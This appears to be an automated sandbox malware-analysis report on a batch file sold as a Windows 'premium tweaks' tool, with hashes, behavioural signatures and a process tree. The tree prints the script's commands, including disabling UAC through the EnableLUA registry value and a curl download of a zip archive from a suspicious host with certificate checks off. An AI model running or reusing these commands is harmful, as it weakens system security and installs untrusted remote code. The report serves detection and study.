Analysis

  • max time kernel
    125s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 19:56

General

  • Target

    EXM_Premium_Tweaks_Updated.bat

  • Size

    671KB

  • MD5

    ddf58a74066626c7fee766bc37098b43

  • SHA1

    03ccb5c9bf270f2b7ad1e0b92419e1b7609aebdf

  • SHA256

    1fe528ffd9622a7ad3c6a7d343db9d4a8f89d948f91f2d685795f3a0c2370352

  • SHA512

    1943956adc080c3a0529471997f2ed54fd796ad793ce431760577df8ca17e6b293846a312106c7c39e68e8aa4f3986f653436e67a6de0246ff59cca164c98a09

  • SSDEEP

    3072:aDGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:aDGiVNEn14IZVvisL43

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaks_Updated.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Windows\system32\reg.exe
      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
      2⤵
        PID:1288
      • C:\Windows\system32\reg.exe
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        2⤵
          PID:1660
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
          2⤵
            PID:2180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1592
          • C:\Windows\system32\reg.exe
            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
            2⤵
              PID:4316
            • C:\Windows\system32\reg.exe
              Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
              2⤵
              • UAC bypass
              PID:4464
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:400
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_UserAccount where name="Admin" get sid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1892
              • C:\Windows\system32\findstr.exe
                findstr "S-"
                3⤵
                  PID:1368
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:2940
                • C:\Windows\system32\chcp.com
                  chcp 437
                  2⤵
                    PID:4036
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1064
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    2⤵
                      PID:1100
                    • C:\Windows\system32\chcp.com
                      chcp 437
                      2⤵
                        PID:2232
                      • C:\Windows\system32\curl.exe
                        curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://anime-girl.hacked-your.tech/content/cdn/WkXASIbAfYeb/exm.zip"
                        2⤵
                          PID:5056
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1660
                      • C:\Windows\system32\srtasks.exe
                        C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4204

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        6cf293cb4d80be23433eecf74ddb5503

                        SHA1

                        24fe4752df102c2ef492954d6b046cb5512ad408

                        SHA256

                        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                        SHA512

                        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        64B

                        MD5

                        235a8eb126d835efb2e253459ab8b089

                        SHA1

                        293fbf68e6726a5a230c3a42624c01899e35a89f

                        SHA256

                        5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

                        SHA512

                        a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hwzutnlv.qul.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • memory/1064-31-0x000002539F450000-0x000002539F460000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-27-0x00007FFE360D0000-0x00007FFE36B91000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1064-29-0x000002539F450000-0x000002539F460000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-28-0x000002539F450000-0x000002539F460000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-30-0x00007FFE360D0000-0x00007FFE36B91000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1064-32-0x000002539F450000-0x000002539F460000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-33-0x000002539F450000-0x000002539F460000-memory.dmp

                        Filesize

                        64KB

                      • memory/1064-36-0x00007FFE360D0000-0x00007FFE36B91000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1592-11-0x000001EEFDA90000-0x000001EEFDAA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1592-15-0x00007FFE372D0000-0x00007FFE37D91000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1592-12-0x000001EEFDA90000-0x000001EEFDAA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1592-10-0x00007FFE372D0000-0x00007FFE37D91000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1592-7-0x000001EEFDD40000-0x000001EEFDD62000-memory.dmp

                        Filesize

                        136KB